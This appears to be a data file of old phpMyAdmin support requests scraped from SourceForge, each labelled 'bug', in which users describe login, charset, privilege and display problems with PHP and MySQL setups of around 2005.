All other websites and programs that use PHP and MySQL are running fine.
Even phpMyAdmin version 2.2 is running fine.
Original URL https sourceforge.net p phpmyadmin support requests 668 https sourceforge.net p phpmyadmin support requests 668 Original author hiawatha Found in version 2.6.2 rc1","bug"
"24444","2491","How to add user.
How do I add a user and transfer admin power to that user?
Original URL https sourceforge.net p phpmyadmin support requests 670 https sourceforge.net p phpmyadmin support requests 670 Original author pixelateddream","bug"
"24444","2492","Privileges Management.
I m trying to create users using phpMyAdmin.
From what I read, I should be able to do this using the Privileges section.
The phpMyAdmin installation at my ISP doesn t seem to show that particular button option.
I can create databases, tables, etc.
through the browser, but I don t see anyplace where I can manage users.
Original URL https sourceforge.net p phpmyadmin support requests 672 https sourceforge.net p phpmyadmin support requests 672 Original author zstarmanz","bug"
"24444","2493","Cookie configuration gives error 1045.
I have WinXP Pro with PHP 5.0.4 Apache 2.0.53.
When using PHPMyAdmin 2.6.1 I can use cookie Authentication, however when upgrading to 2.6.2 when I try and use cookie Authentication, I get the following error 1045 Access denied for user ODBC localhost using password YES) When using http authentication, it works.
The username I am using is root NOT odbc!
Original URL https sourceforge.net p phpmyadmin support requests 673 https sourceforge.net p phpmyadmin support requests 673 Original author compatcart","bug"
"24444","2494","tbl replace.php Missing parameter db.
tbl replace.php Missing parameter db tbl replace.php Missing parameter table tbl replace.php Missing parameter goto I get these errors while trying to update any Metadot tables.
On a twin system it works perfectly.
Any ideas?
We need help desperately.
Thanks!
BobSeymour Lawrence Livermore National Lab seymour10 llnl.gov We have phpMyAdmin 2.6.1 MySQL 4.1.7 running on localhost as root localhost PHP Version 5.0.3 Linux sokei.llnl.gov 2.4.21 20.ELcustom1394 2 SMP Mon Sep 20 14 29 42 PDT 2004 x86 64 Apache 2.0 Handler Original URL https sourceforge.net p phpmyadmin support requests 674 https sourceforge.net p phpmyadmin support requests 674 Original author seymour10","bug"
"24444","2495","Charset utf 8 and iso 8859 2 does not display properly.
When using MySQL version 4.1.11 there is a problem to correctly display data in utf 8 charset and iso 8859 2 charset I did not try any other charsets, but is seems to be persistent).
See attached screen print.
The meta tag looks correct lt;meta http equiv= Content Type content= text html; charset=utf 8 gt; but the data are displayed as if I had charset=iso 8859 1 in the meta tag.
This problem did not occur with MySQL version 4.0.x.
Original URL https sourceforge.net p phpmyadmin support requests 676 https sourceforge.net p phpmyadmin support requests 676 Original author vstwora","bug"
"24444","2496","XAMPP Installation Issue.
I have installed XAMPP on a Solaris 8 system.
I can bring up the XAMPP splash page and the followmain page for XAMPP.
The links to the left allow me to go to PhpSQLiteAdmin page listing the contents of my MySQL database.
However, when I attempt to follow the PHPMyAdmin link, the browser states I do not have permission to view the page.
I am logged in as root on the machine, the PhpSQLiteAdmin page comes up fine.
Where might I have missed a configuration change to allow this page to be viewed?
Further info; the directory and the filehave been opened up completely for R W E permissions.
Original URL https sourceforge.net p phpmyadmin support requests 677 https sourceforge.net p phpmyadmin support requests 677 Original author webtramper Found in version 2.6.0 pl3","bug"
"24444","2497","Search selects individual fields when all selected.
OS MacOSX 10.3.9 PHP 5.0.4 entropy.ch release 1) MySQL 4.1.8 Browsers used Safari MacOS), Firefox 1.0.3 WinXP), Opera 8 WinXP) We have a table with 24 fields of various types.
When using the search function of phpMyAdmin on this table, and requesting that all fields be displayed the default), it runs a query which attempts to select all of the fields individually.
That is to say that instead of running SELECT it runs SELECT field1,field2,field3 ... etc .
On other, smaller tables, it runs a SELECT query under these circumstances.
At the same time, when returning results, it complains that I haven t specified a primary key incorrectly, one exists), and although it will display the results, it will not let give me the option to delete rows, and will sometimes not display the edit option replacing the icons with a question mark which has a tool tip saying You should define a primary key for this table , of which one already exists in the form of an auto incrementing unsigned integer).
This problem does not occur when browsing said table, or when manually running a SELECT query on the same table, nor does it occur on any other table in the database but this one has the highest field count).
This leads me to believe that this is a phpMyAdmin bug.
The structure of the table is included.
Original URL https sourceforge.net p phpmyadmin support requests 678 https sourceforge.net p phpmyadmin support requests 678 Original author pzenix","bug"
"24444","2498","Blank page fresh install 2.6.2 cookie authentication.
This may or may not be a bug.
I downloaded the phpMyAdmin 2.6.2.tar.gz file on Sat Apr 23 09 47 21 SAST 2005.
I did a normal tar zxvf phpMyAdmin 2.6.2.tar.gz of the distribution and a ln s phpMyAdmin 2.6.2 phpMyAdmin.
Then I edited the config.in.php file as I have many times before.
I selected cookie authentication mode.
I also created the phpmyadmin database with all the tables for the bookmarks, etc... Then I proceeded to access phpMyAdmin via http my.domain.com phpMyAdmin and was presented with a blank page.
I examined the var log httpd error log file and found the following errors [client 165.165.222.107] PHP Warning main .
libraries auth coookie.auth.lib.php) failed to open stream No such file or directory in var www html phpMyAdmin 2.6.2 libraries common.lib.php on line 1220 [client 165.165.222.107] PHP Fatal error main ) Failed opening required .
libraries auth coookie.auth.lib.php include path= .
usr share pear ) in var www html phpMyAdmin 2.6.2 libraries common.lib.php on line 1220 I then went to .
libraries auth and did a ln s cookie.auth.lib.php coookie.auth.lib.php, which fixed the problem.
Hope this helps.
Regards, Carl Original URL https sourceforge.net p phpmyadmin support requests 679 https sourceforge.net p phpmyadmin support requests 679 Original author carlswart","bug"
"24444","2499","Access denied www data After SQL upgrade).
I just upgraded from MySQL 4.0.18 to 4.0.24 and phpMyAdmin 2.6.2 seems to be broken.
I use auth method cookie and it seems that no matter what username I enter in at the login, it tries to log me in as user www data.
I have tried resetting all the passwords and flushing the privledge tables.
I have tried logging in with the same user pass combo at the command line it works).
I have tried setting the auth type to config and that works.
I have also verified that phpMyAdmin logs in with the control user OK because when I input incorrect info in the config for the control user I get a different error).
No matter what, it does not let me in!
I get error Cannot login to MySQL server and this shows up in the SQL logs Access denied for user www data localhost Using password YES) Even though I did not try logging in with this username.
I recently upgraded from MySQL 2.0.18 to 2.0.24 on Debian.
Please help!!!
Original URL https sourceforge.net p phpmyadmin support requests 682 https sourceforge.net p phpmyadmin support requests 682 Original author prohtex Found in version 2.6.2 rc1","bug"
"24444","2500","Cannot change table type.
Cannot change the table type using the web interface.
If the table is currently set to MyISAM, selecting anything else will send a query that attempts to change it to MyISAM, which obviously does nothing.
I can change the table type manually by using the interface to send an SQL statement to the server, or by executing the statement directly through the MySQL console.
I went so far as to look at the HTML source for the page, to see if for some reason the input control had all its options set to MyISAM, but it seemed to be set correctly.
So my assumption is that a variable isn t being accessed correctly by phpMyAdmin.
Original URL https sourceforge.net p phpmyadmin support requests 683 https sourceforge.net p phpmyadmin support requests 683 Original author parklandspanwy","bug"
"24444","2501","Privileges and Databasenames.
Dear phpMyAdmin team, it seems we recently found a bug in phpMyAdmin which is a real curious one.
Our test environment phpMyAdmin 2.6.1 2.6.2 mysql 4.0.24 PHP 4.3.10 4.3.11 a database with character in Database Name mysql.user Privilege Show db priv set to no config.inc.php Database configuration is set to only ONE Database using cfg[ Servers ][ i][ only db ] = test db ; If you load up phpMyAdmin with the mentioned environment you are prompted with the message Fatal error Call to undefined function pma reloadnavigation ) in path to phpMyAdmin installation header.inc.php on line 132 What we ve tried as of yet is escaping the in the Databasename cfg[ Servers ][ i][ only db ] = test\ db ; Then you can load up PMA without any errormessage BUT your Start Screen displays add new DB and as Databasename test?db is autofilled.
You see the beeing replaced by ?
.
If we remove the escape and set the users Show db priv to yes everything works well.
Any help appreciated Original URL https sourceforge.net p phpmyadmin support requests 685 https sourceforge.net p phpmyadmin support requests 685 Original author fli7e2005","bug"
"24444","2502","Can t login with 2.6.2.
I am running php on IIS and server 2003.
After updating to phpmyadmin 2.6.2 I am not longer able to login.
After I have typed in the password, the login screen appears again without the password.
I am using the cookie authorisation and the old config.inc.php After changing back to 2.6.1pl3 it was again working fine.
Original URL https sourceforge.net p phpmyadmin support requests 686 https sourceforge.net p phpmyadmin support requests 686 Original author hgalt","bug"
"24444","2503","edit delete row icons doesn t displayed.
edit delete row icons doesn t displayed.
FreeBSD 5.1 phpMyAdmin 2.6.2 MySQL 4.1.11 PHP 4.3.11 Had some issue with mysql server .. Upgraded mysql server client, php apache, then noticed missing edit delete rows icons on phpmyadmin..
Tried with Mysql 5.0.3 too but same issues I think its not phpmyadmin fault but would like to know why are those icons are missing everything else seems to work fine.
http www.kende.com pma.jpg screenshot http www.kende.com php.php phpconfig ); Thanks, Andras Original URL https sourceforge.net p phpmyadmin support requests 688 https sourceforge.net p phpmyadmin support requests 688 Original author andraskende Found in version Latest Git snapshot","bug"
"24444","2504","Cookie authentication uses always the apache user.
When trying to use cookie based authentication method to the MySQL server, the server rejects the authentication and reports that Access denied for user apache server) using password YES) even the user entered to the authentication form was not apache.
When switching to http or config based authentication, no problems are encountered.
PHP 4.3.11, Apache 2.0.48, MySQL 4.1.11.
Original URL https sourceforge.net p phpmyadmin support requests 689 https sourceforge.net p phpmyadmin support requests 689 Original author villemattila","bug"
"24444","2505","Record editing options missing w mysql 4.1.3 beta and 2.6.2.
After upgrading to mysql 4.1.3 beta .
I can no longer edit records from within phpmyadmin.
Other db tools work just fine and my php code is working properly.
Could this be due to a change in the mysql database table structures?
The problem exsisted on several different versions of phpmyadmin including 2.6.2 Original URL https sourceforge.net p phpmyadmin support requests 690 https sourceforge.net p phpmyadmin support requests 690 Original author elinberg","bug"
"24444","2506","Fatal error Call to undefined function.
I need help !
My phpbb forum crashed lately...
I reinstalled it and update to version 2.0.15. due the the reinstall I lost all data, so I wanted to restore it from my backup... thus I tried installing phpMyAdmin... although, when I try to open index.php I get this; Fatal error Call to undefined function pma generate common url ) in home bbpyro public html phpmyadmin index.php on line 53 I d really appreciate if somebody could help...
Original URL https sourceforge.net p phpmyadmin support requests 707 https sourceforge.net p phpmyadmin support requests 707 Original author bbpyro","bug"
"24444","2507","only white page shown on starting browser with phpMyAdmin.
WAMP with Apache 2.054, Mysql 5.04 beta, php 5.04, phpmyadmin 2.62 on Win XP proff.
After installation everything runs except phpMyAdmin which shows only a white page with nothing in it, if I call it with http localhost phpMyAdmin .
Checked already numerous hints from the web, but nothing helps.
There a hundreds of white sides in the web all different.
Need a solution for getting started with phpMyadmin.
Original URL https sourceforge.net p phpmyadmin support requests 691 https sourceforge.net p phpmyadmin support requests 691 Original author ricardo2005 Found in version 2.6.2 rc1","bug"
"24444","2508","preg match error.
I seem to be getting errors after I have uploaded phpmyadmin 2.6.2 pl1.
This is an error I receive Fatal error Call to undefined function preg match ) in usr home phpmyadmin public html libraries defines.li b.php on line 36 Server Information PHP Version 4.3.9 FreeBSD 5.3 MySQL Version 3.23 Apache Version 1.3 I get the same error on IE 5, IE 6, Netscape 4.71, and Firefox 1.0.3 Original URL https sourceforge.net p phpmyadmin support requests 692 https sourceforge.net p phpmyadmin support requests 692 Original author jdauction","bug"
"24444","2509","charset utf 8 display problem with mysql 4.1.11.
I have developed a website with multi language features and I am using Apache 2, PHP 5.0.4 and MySQL 4.1.11 Debian 3 log.
All data in the database is utf 8 and is displayed correctly on my website.
When I am trying to edit some text in the database with phpMyAdmin 2.6.3 rc1, all utf 8 data is converted twice into utf 8 and all special characters are shown very strange.
When I try to insert new text with phpMyAdmin or modify old one and press the OK button, to save changes, the text is stored in latin1 format in the database and is displayed as ?
signs on my website, which is utf 8.
In PMA the new data is displayed correctly in the browser and is encoded in utf 8, hmm ?!
My database is utf 8 and all collations are set to utf8 general ci.
I think the problem is that PMA is connecting to the database using utf 8 and my website PHP mysql client encoding) is using latin1 for the connection.
For example, when I enter the sql command SET CHARACTER SET latin1 ; SELECT FROM `multi language` LIMIT 0, 30; in PMA, all characters are displayed correctly xc3xbc, xc3xa4, xc3xb6, ...), but after any click or action the characters shown like xc4x82xc5xbaxc4x82xc2xa4xc4x82xc5x9b ...
So all data, even when its iso 8859 1, 2, ..., or utf 8 is transfered from the database to my website 1 1, with no conversion.
When the data is displayed in PMA it is converted in utf 8, even when its still utf 8.
I tried to change everything, in the config file of PMA and the settings of the database, even table collations, etc.
but every time I connect to the database with PMA the problem occurs.
I saw under http sourceforge.net tracker index.php?func=detail aid=1187742 group id=23067 atid=377408 that there is the same problem, but the difference is, that I was using mysql 4.1.11 from the beginning on.
This problem did not occur with mysql version 4.0.x.
Original URL https sourceforge.net p phpmyadmin support requests 711 https sourceforge.net p phpmyadmin support requests 711 Original author k dev4edv","bug"
"24444","2510","i have no administrators set up now.
help!.
I was adding modules in my mambo admin page and did something bad.
i somehow now have no administrators set up so i cannot access my admin pages and a lot of my content is not showing.
does anyone know what i did and how to fix this?
thank you so much i am a PR guy, not a programmer.
my web guy quit and left me hanging.
thanks so much!
bert www.omcollective.com Original URL https sourceforge.net p phpmyadmin support requests 693 https sourceforge.net p phpmyadmin support requests 693 Original author om4us","bug"
"24444","2511","phpMyAdmin 2.6.2 pl1 does not work under PHP >=4.3.10.
phpmyadmin incorrectly shows databases list in a left frame see in attachment.
There was a warning reffering to libraries url generating.lib.php on line 91, saying that argument missing for urlencode ) function.
Under PHP lt;=4.3.9 works fine.
Original URL https sourceforge.net p phpmyadmin support requests 694 https sourceforge.net p phpmyadmin support requests 694 Original author pentarh udi","bug"
"24444","2512","Query failes if there s a subquery in from clause.
I ve tried several queries with subqueries in the from clause like this select a, b from select a, b from table c)x I get the error message 1146 Table [database name.table name] doesn t exist Of course, the corresponding database is selected.
But it seems to me, that s not recognized by phpMyAdmin.
I ve used Apache 2.0.52, PHP 5.0.4, MySQL 4.1.11 nt, phpMyAdmin 2.6.2 pl1 on Windows XP.
Original URL https sourceforge.net p phpmyadmin support requests 695 https sourceforge.net p phpmyadmin support requests 695 Original author ppzmpopp","bug"
"24444","2513","invalid url probably too long?.
I am running a long query not long in terms of execution, but long in terms of characters).
The query executes fine but if I want to edit export explain ... the uri request, which 5093 characters long, is truncated.
I am using Firefox as a browser.
I have tried using tinyurl to make is shorter, but I am afraid this has to do with something else, as the result is the same.
Anyone has seen this before?
Any ideas on how to get around it?
Thx, Erwin Original URL https sourceforge.net p phpmyadmin support requests 696 https sourceforge.net p phpmyadmin support requests 696 Original author efeldhaus Found in version 2.6.0 rc3","bug"
"24444","2514","Inserting data.
hey, i have been trying to get the data from my 2.6.2 pl1 to my server which is 2.6.2 r1 ... i know they are different but they are thearetically equivilent so i thought it should work..
Apparently it doesn t and i am wondering if there is a place i can get r1 to make it equal os i can transfer from home to there and so on, because all i get now is errors that it is in wrong format or something.
Anyways, Thanks D Original URL https sourceforge.net p phpmyadmin support requests 697 https sourceforge.net p phpmyadmin support requests 697 Original author nathanielk Found in version 2.6.2 beta1","bug"
"24444","2515","new database mysteriously appeared ??!.
I apoligize if this is the wrong place to post this question.
I ve been using phpmyadmin for a while now and this is the first time I ve had this happen.
I have a new database that appeared out of nowhere.
The name is phpmyadmin jt83BO9czn8X.
It has 7 tables which are all empty pma bookmark pma column info pma history pma pdf pages pma relation pma table coords pma table info Any idea where this may have come from.
I m fearing a hacker, but maybe it s a perfectly normal thing.
This system is running Plesk, which is new to me.
Thanks!
Original URL https sourceforge.net p phpmyadmin support requests 698 https sourceforge.net p phpmyadmin support requests 698 Original author lizard88","bug"
"24444","2516","http authentication using a custom http webserver.
Hello!
a few colleagues of mine and I are working on a project, and as such have created our own custom webserver rather than using apache, as we re doing this primarily in a Win 2003 environment).
My question, and perhaps I ve missed it in the documentation but I didn t see it during my first few times through How does phpMyAdmin actually do http authentication?
Basically, I want to be able to pass it the user that has already been authenticated through our server so that it will then call the mySQL controluser to authenticate THAT user in mySQL and then let them do as they are permitted in the permissions tables.
First, is this even possible, and do I even have another option?
I ve been pretty stumped as to how to proceed, and I haven t seen much in the docs explaining how phpMyAdmin actually handles this authentication.
Again, I could have missed it, but any help you could give me would be infinitely appreciated ) Thanks and have a nice day, Targ Original URL https sourceforge.net p phpmyadmin support requests 718 https sourceforge.net p phpmyadmin support requests 718 Original author targonis","bug"
"24444","2517","query window bugs [Safari].
When using phpmyadmin 2.6.2, there are 3 rather annoying bugs, possibly related 1\.
Checking show this query here again does not preserve the query as advertised.
2\.
Checking do not overwrite this query from outside window does not prevent the query from being overwritten from outside the window.
3\.
SQL history is always blank, regardless of how many queries have been executed.
Original URL https sourceforge.net p phpmyadmin support requests 699 https sourceforge.net p phpmyadmin support requests 699 Original author fonnesbeck","bug"
"24444","2518","Error 1064.
Don t know what the heck I have wrong.
Here s the simple install info php version 4.3.4 mysql 4.1.0 alpha freebsd 5.2.1 phpmyadmin 2.6.0 pl3 This is pretty much a clean install and with phpmyadmin all I seem to be able to get is SQL query Documentation SELECT foo FROM `user` WHERE CONVERT User USING ) = CONVERT root USING ) AND CONVERT Host USING ) = CONVERT localhost USING ) ; MySQL said Documentation 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near ) = CONVERT root USING ) AND CONVERT Host USING ) = CONVERT I have no access to anything so my guess is either PHP or MYSQL is so old it just don t want to work.
Tried some of the more dated versions and still no luck.
Should I just get PO d and upgrade everything or is there an easier solution?
Original URL https sourceforge.net p phpmyadmin support requests 700 https sourceforge.net p phpmyadmin support requests 700 Original author megarock","bug"
"24444","2519","Undefined variable current identifier.
It appears as if the variable current identifier is being tested against in sqlparser.lib.php, even though it may be null Notice Undefined variable current identifier in Users rluck Sites phpMyAdmin libraries sqlparser.lib.php on line 1631 Notice Undefined variable current identifier in Users rluck Sites phpMyAdmin libraries sqlparser.lib.php on line 1631 Notice Undefined variable current identifier in Users rluck Sites phpMyAdmin libraries sqlparser.lib.php on line 1631 Notice Undefined variable current identifier in Users rluck Sites phpMyAdmin libraries sqlparser.lib.php on line 1631 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries header http.inc.php on line 17 Warning Cannot modify header information headers already sent by output started at Users rluck Sites phpMyAdmin libraries sqlparser.lib.php 1631) in Users rluck Sites phpMyAdmin libraries header http.inc.php on line 20 Original URL https sourceforge.net p phpmyadmin support requests 701 https sourceforge.net p phpmyadmin support requests 701 Original author pifmag Found in version 2.6.2 rc1","bug"
"24444","2520","Privileges and database names.
A database name with a in it is shown escaped with a \ in the list of the user s database specific privileges.
I m running PHPMyAdmin 3.6.2pl1, MySQL 4.1.11, PHP 5.0.4 and Apache 2.0.53.
Original URL https sourceforge.net p phpmyadmin support requests 702 https sourceforge.net p phpmyadmin support requests 702 Original author kedrikd","bug"
"24444","2521","can t login with mysql 4.1.12.
After installing mysql 4.1.12, I can t login phpmyadmin.
Original URL https sourceforge.net p phpmyadmin support requests 703 https sourceforge.net p phpmyadmin support requests 703 Original author hanpedro","bug"
"24444","2522","Wrong count of lines.
Sorry I don t really speak english.
However I will try to be understandable.
With this query SELECT DISTINCT b.i,e.i FROM b LEFT JOIN e ON b.i=e.i then count of lines reported by phpmyadmin is wrong.
In facts, lines with NULL content added by MySQL for the e table when no corresponding value in b table) in the answer seem not taken in count.
As consequence, one can t view the whole result s list in certain cases paging depending).
Workaround view all lines in only one page.
Regards, Etienne Durup Original URL https sourceforge.net p phpmyadmin support requests 704 https sourceforge.net p phpmyadmin support requests 704 Original author edurup Found in version 2.6.2","bug"
"24444","2523","phpMyadmin redirecting my to a website called Var Business.
Hi, I am getting a very strange bug with phpMyAdmin where none of the images in the template show up, but the strangest thing is that whatever link I click, phpMyAdmin redirects the browser window to a website which I have never heard of before, www.varbusiness.com.
This happens for every link on the main page, which means I can t acctually do anything.
When using the drop down database selector the website opens in the sidebar as you can see in the attached image.
Cheers Original URL https sourceforge.net p phpmyadmin support requests 723 https sourceforge.net p phpmyadmin support requests 723 Original author jedeye Found in version 2.6.3 rc1","bug"
"24444","2524","2.5.6) update affects non specified column.
I ran the MySQL query UPDATE my table name SET my column true and not only did it update my column to true for every single record, it also updated the date submitted column to NOW ) for every single record.
NOW ) is the default function for the date submitted column for new records, but is this actually how it is supposed to work?
my column is an enum that can be either true or false .
Original URL https sourceforge.net p phpmyadmin support requests 705 https sourceforge.net p phpmyadmin support requests 705 Original author jamesgregory Found in version 2.5.6","bug"
"24444","2525","Importing a file into phpMyAdmin.
All utf 8 characters which are not part of the standard ascii table are not being exported properly characters are jumbled).
This in effect makes the export function on phpmyadmin totally useless because it will corrupt your data.
Original URL https sourceforge.net p phpmyadmin support requests 706 https sourceforge.net p phpmyadmin support requests 706 Original author luegner","bug"
"24444","2526","French accents.
When doing a backup through Export on phpmyadmin) of my database, my French accents are all changed into ?
question marks) The data appears in the original database correctly, but when a backup is made, this conversion takes place.
The collation seems to be set at latin1 swedish ci.
This collation is new to me I have always used mysql through telnet previously.
Could someone help?
Many thanks.
NBrown ngb55 hotmail.com Original URL https sourceforge.net p phpmyadmin support requests 708 https sourceforge.net p phpmyadmin support requests 708 Original author ngb55","bug"
"24444","2527","cant browse after mysql upgrade to 4.X.
Make sure you comment out mod auth mysql from apache if it s enabled.
It s compiled against mysql libraries that won t work with mysql 4.
Original URL https sourceforge.net p phpmyadmin support requests 709 https sourceforge.net p phpmyadmin support requests 709 Original author tiredofchex99","bug"
"24444","2528","encoding error db.
Look at the screenshot .
when i export the db through phpmyadmin and then i reimport it all greek letters are unreadable.
If i backup the db from cpanel and i restore it again than it works.
so there must be a bug with phpmyadmin and greek.
but i need to find a solution soon.
If i change the collation nothing happens, Either i need to convert the db or i dunno.
I need to find a way to be able to backup the db throygh phpmyadmin normally Original URL https sourceforge.net p phpmyadmin support requests 710 https sourceforge.net p phpmyadmin support requests 710 Original author tsakalos","bug"
"24444","2529","Database name always in lowercase.
phpMyAdmin web based MySQL client doesn t allow to create the database name in uppercase, this is a important bug, because MySQL Server in nix is case sensitive and everytime I have to dump the database in a SQL format, I have to change the database name to uppercase manually.
This occur when you write the SQL statement in uppercase.
In Microsoft Windows this bug is insignificant due to that in this Operating System MySQL Server is non case sensitive.
Original URL https sourceforge.net p phpmyadmin support requests 712 https sourceforge.net p phpmyadmin support requests 712 Original author ojpp Found in version 2.6.3 rc1","bug"
"24444","2530","connectivity.
I m new to this but here goes.
I set up a webhosted site through Yahoo.
Downloaded mysql and Phpadmin.
Created db and tables.
I have written code from sitebuilder on my local drive and published to the Yahoo hosted site.
The problem is I cannot recognize a mysql connection and when I write in php and insert into sitebuilder, I do not always get a return.
Most of this code has been copied from proven locations so the code appears to be fine, it seems to be a connection that I just don t understand.
Any help please.
Original URL https sourceforge.net p phpmyadmin support requests 713 https sourceforge.net p phpmyadmin support requests 713 Original author ervinm Found in version 2.5.0","bug"
"24444","2531","File does not exist usr local www phpMyAdmin normal.
This I have in logs... [Fri Jun 17 23 10 23 2005] [error] [client .
.
. ]
File does not exist usr local www phpMyAdmin normal Clean install!
I use themes original There is no such problem when I use themes darkblue orange Original URL https sourceforge.net p phpmyadmin support requests 714 https sourceforge.net p phpmyadmin support requests 714 Original author makc666 Found in version 2.6.3 rc1","bug"
"24444","2532","No databases and no priviledges.
Hello all, I have installed PHPMyAdmin but could really use some help with connection troubles.
PHPMyAdmin comes up, I am able to login and connect to the remote database host name supplied by my ISP) OK but PHPMyAdmin shows no databases and no priviledges to create a new database.
There is no error.
It just shows no databases and no priviledges.
I am able to connect to the same database as the same user, from a web based ISP application WebesiteOS).
When I do that I can see the databases I have created through WebsiteOS just fine.
I am using the cookie based authentication method in the PHPMyAdmin config file.
Do you have any ideas what might be wrong?
My ISP has PHP version 4.3.10 installed.
I couldn t see a way to determine the mySQL version.
Thanks for any help you can provide.
North Original URL https sourceforge.net p phpmyadmin support requests 715 https sourceforge.net p phpmyadmin support requests 715 Original author myriad one","bug"
"24444","2533","Problem deleting tables PHP5.
hi Im having a strange issue using PHP5.
I can t delete tables from the database menu,using the traditional method.
deletion only works using the sql query box.
relevant information PHP 5.0.3 MySQL 4.1.10a apache 2.0.53 prefork) phpmyadmin version phpMyAdmin 2.6.2 pl1 php.ini settings error reporting = E ALL E NOTICE E STRICT register long arrays= On zend.ze1 compatibility mode =On using the mysql extension.
no errors,no warnings any idea?
Original URL https sourceforge.net p phpmyadmin support requests 716 https sourceforge.net p phpmyadmin support requests 716 Original author judas iscariote Found in version 2.6.1 rc2","bug"
"24444","2534","Nothing is happening index.php).
Can anyone help, I have congiured the config.inc.php file as instructed but when I try to access the Index.php via internet explorer nothing happens.
I have uploaded the phphmyadmin file to my domain on www.easyspace.co.uk.
phpMyAdmin 2.6.2 pl1) Can anyone help please Stephen Original URL https sourceforge.net p phpmyadmin support requests 717 https sourceforge.net p phpmyadmin support requests 717 Original author gigbox Found in version Latest Git snapshot","bug"
"24444","2535","Unable to change password upgrading phpmyadmin and MySQL).
I recently upgraded from MySQL 3.23.58 Fedora Core 1) to 4.1.11 Fedora Core 4).
I noticed problems, so I also upgrade phpMyAdmin to the latest.
Welcome to phpMyAdmin 2.6.3 pl1 MySQL 4.1.11 running on localhost as root localhost I seem to have a problem setting passwords.
I notice if I cut and past an existing password into the password field for a new account, I can change the password to something that works.
There seems to be a new password ) mechanism for MySQL.
If I set a password using that function I can log in via the mysql client, but can t with phpmyadmin.
For version reasons I m linked to an older version of the mysql client library for php, which may be why the new authentication mechanism doesn t work.
I m living through version hell because of a bug in PHP5 which forced me to downgrade, and a problem with the too new compiler in FC4 such that I can t compile the older php on this machine).
php 4.3.11 2.6 mysqlclient10 3.23.58 6 Is there anything I can set to have phpmyadmin store old style passwords?
Original URL https sourceforge.net p phpmyadmin support requests 735 https sourceforge.net p phpmyadmin support requests 735 Original author russellmcormond","bug"
"24444","2536","Connection terminated unexpectedly....
I get this in the browser when clicking on any link from index.php The connection to servername has terminated unexpectedly.
Some data may have been transferred.
I think I saw this problem documented somewhere, but can t find it again to save my life yes, I Googled it!)
I have tested php info ), tried some pages for a test php site with mailer code, and phpMyAdmin sees the mySQL database I fixed those errors before getting to this one).
Setup PHP 5.0.4 IIS5 gt; php CGI.exe phpMyAdmin 2.6.3 rc1 mysql 4.1.12a Thank you in advance for any help you can provide a PHP mySQL newbie, Jason Original URL https sourceforge.net p phpmyadmin support requests 719 https sourceforge.net p phpmyadmin support requests 719 Original author jsrobinson Found in version Latest Git snapshot","bug"
"24444","2537","Accepting Null values in Not Null fields.
Steps to Reporduce 1\.
Click a new Database say xc2x91DB1xc2x92 2\.
Create a table say xc2x93Testxc2x94 with two fields say xc2x93Eidxc2x94 and xc2x93Enamexc2x94under the above database 3\.
Select xc2x91Not Nullxc2x92 in the xc2x91Nullxc2x92 field for the both the xc2x93Eidxc2x94 and xc2x93Enamexc2x94 fields in the table 4\.
Click on the lt;Save gt; button 5\.
Notice the table xc2x93Testxc2x94 has been created 6\.
Select xc2x93Insertxc2x94 tab 7\.
Just click on the lt;Go gt; button without inserting any values 8\.
Select xc2x93Browsexc2x94 tab 9\.
Notice the null values are inserted Environment Operating System Win XP Professional 2002 SP2 Browsers IE 6.0 phpMyAdmin 2.6.1pl3 Original URL https sourceforge.net p phpmyadmin support requests 720 https sourceforge.net p phpmyadmin support requests 720 Original author chandramohan Found in version 2.6.1 pl3","bug"
"24444","2538","browser issue.
I have installed LDAPPHPAmin version 0.9.6c) with a PHP server version 4.3.11 on an NT4 sp6a with IIS4 as webserver.
Web Browser is Firefox 1.04 or IE6 the problem is the same).
LDAP server is OpenLDAP version is 2.2.19 slapd version) It s a win32 OpenLDAP version running on NT4SP6a, available at http lucas.bergmans.us ) PHP server is running fine already runs forr another PHP application Webcalendar ) The LDAP server is running fine too I have created accounts with LDAP client as LDAP editor 2.8.1 availabe on www.iit.edu gawojar ldap) I canquery my LDAP server with thunderbird too as address book) I have configured I hope..) my config.php.
When I launch my web browser I arrive on the welcome page, with login screen servers[ i][ auth type ] = cookie ;) I can login with anonymous or Manager account.
The only result is a blanck screen with Successfully logged into server lt;servername gt; where lt;servername gt; is the same as define in servers[ i][ name ] field from config.php file.
But there is nothing else, I can t browse my LDAP tree.
If I change setting servers[ i][ auth type ] = cookie to config .
It works a I can show and browse my LDAP tree.
If I come back to cookie settings I can login but I can t browse and I use the same user account manager, who is OrganisationalRole object class.).
If I use session settings it s working fine too.
Is it a problem of cookies my browser allow cookies, and I have forced to acept cookies from the web server PHPLDAPAdmin ?
If someboby can tell me where is my error ?
Thanks Original URL https sourceforge.net p phpmyadmin support requests 737 https sourceforge.net p phpmyadmin support requests 737 Original author monnot","bug"
"24444","2539","User name text box has no validation.
1.Click on Privilege link in the home page 2.Click on Add a new user link 3.In the User name combo box, select Use text field and then enter !
special characters) in the text box 4.In the Host combo box, select Any host 5.In the Password combo box, select No password 6.Click on the Go button Note User name field is accepting special character and is creating a user name of the same.
It also creates users with Emp , Emp white space Emp), Emp double white space Emp).
It considers all these users as different users eventhough they possess same name.
I have also attached screen shots for reference.
Original URL https sourceforge.net p phpmyadmin support requests 721 https sourceforge.net p phpmyadmin support requests 721 Original author anusya rs Found in version 2.6.1 pl3","bug"
"24444","2540","No results displayed attemping to browse any table.
Hello, I ve tried a number of versions, the latest snapshot, the last couple of releases, and I still have the same problem.
I run phpmyadmin on several other hosts with no problem, I m having trouble understanding the cause of my problem here.
When I browse any table from any database), I get a blank page.
The navigation and top header is present, but nothing else.
PhpMyAdmin s able to edit rows, edit table structure, do permission management, but not browse records.
There s no error viewable, and I see nothing in either httpd or php error logs.
If there s any other information I can provide, please contact me.
